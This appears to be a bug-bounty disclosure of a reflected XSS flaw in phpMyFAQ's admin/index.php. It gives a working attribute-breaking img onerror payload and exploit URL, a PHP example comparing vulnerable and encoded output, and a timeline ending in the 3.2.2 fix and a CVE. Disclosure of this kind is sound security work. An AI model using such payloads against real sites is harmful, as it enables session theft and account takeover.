Reflected XSS in /admin/index.php in thorsten/phpmyfaq

Valid

Reported on Sep 30th 2023


Description

I noticed your website is very secure, but you overlooked an XSS flaw.

Proof of Concept

  1. Step 1: Access the demo website
  2. Step 2: Access admin/index.php?action=ngductung"><img src/onerror="alert('XSS')

     Payload: ngductung"><img src/onerror="alert('XSS')

  3. Step 3: Detect XSS

Video PoC

https://ngductung-my.sharepoint.com/:v:/g/personal/ngductung_ngductung_id_vn/EcbTzZBsrXZBuZdf2aScnQ0BOWeP44cBiTwnpDIoV79aOQ?nav=eyJyZWZlcnJhbEluZm8iOnsicmVmZXJyYWxBcHAiOiJPbmVEcml2ZUZvckJ1c2luZXNzIiwicmVmZXJyYWxBcHBQbGF0Zm9ybSI6IldlYiIsInJlZmVycmFsTW9kZSI6InZpZXciLCJyZWZlcnJhbFZpZXciOiJNeUZpbGVzTGlua0RpcmVjdCJ9fQ&e=Zqdo9L

Impact

This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...
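The `">` at the start of the payload suggests the `action` value is echoed into a double-quoted HTML attribute. The sketch below is an added example, not phpMyFAQ code and not the fix from the commit: it shows that pattern next to two defensive layers, output encoding and an allow-list. The hidden-input context, the function names and the action names in `ALLOWED_ACTIONS` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list; the report does not show phpMyFAQ's real action names.
const ALLOWED_ACTIONS = ['dashboard', 'user', 'config'];

// "Before": the raw parameter is concatenated into a quoted attribute,
// so a double quote in the value ends the attribute and starts new markup.
function renderVulnerable(string $action): string
{
    return '<input type="hidden" name="action" value="' . $action . '">';
}

// Layer 1: encode for the HTML attribute context. ENT_QUOTES covers both
// quote styles; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning ''.
function renderEncoded(string $action): string
{
    $safe = htmlspecialchars($action, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="action" value="' . $safe . '">';
}

// Layer 2: anything that is not a known action falls back to a default,
// so unexpected input never reaches the template at all.
function normalizeAction(string $action, string $default = 'dashboard'): string
{
    return in_array($action, ALLOWED_ACTIONS, true) ? $action : $default;
}

// True when the rendered markup still contains an element the template
// did not write itself (here: any <img tag).
function containsInjectedTag(string $html): bool
{
    return stripos($html, '<img') !== false;
}

// Payload quoted from the report's Proof of Concept.
$payload = 'ngductung"><img src/onerror="alert(\'XSS\')';

$cases = [
    'vulnerable'         => renderVulnerable($payload),
    'encoded'            => renderEncoded($payload),
    'allow-list+encoded' => renderEncoded(normalizeAction($payload)),
];

foreach ($cases as $label => $html) {
    $verdict = containsInjectedTag($html) ? 'INJECTED' : 'ok';
    printf("%-20s %-9s %s\n", $label, $verdict, $html);
}
```

Run it with `php` on the command line; only the first row should be flagged, because the encoded variants keep the payload inside the attribute value as inert text.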

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 2 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 2 months ago
Thorsten Rinne validated this vulnerability 2 months ago
tungnd has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.2.2 with commit 97e813 2 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Oct 31st 2023
Thorsten Rinne published this vulnerability a month ago